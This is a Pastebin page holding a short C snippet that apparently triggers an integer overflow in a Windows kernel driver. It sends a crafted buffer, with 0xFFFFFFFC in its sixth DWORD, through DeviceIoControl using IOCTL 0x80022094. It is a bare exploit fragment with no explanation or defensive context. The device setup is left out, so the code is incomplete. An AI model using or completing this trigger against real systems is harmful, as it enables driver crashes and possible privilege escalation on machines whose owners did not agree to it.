Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ioctl = 0x80022094;//int overflow!
- sixth_DWORD = 0xFFFFFFFC;//for int overflow!
- memcpy(inbuff+32, &sixth_DWORD , 0x4);
- DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x10000, (LPVOID)outbuff, 0x10, &len, NULL);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement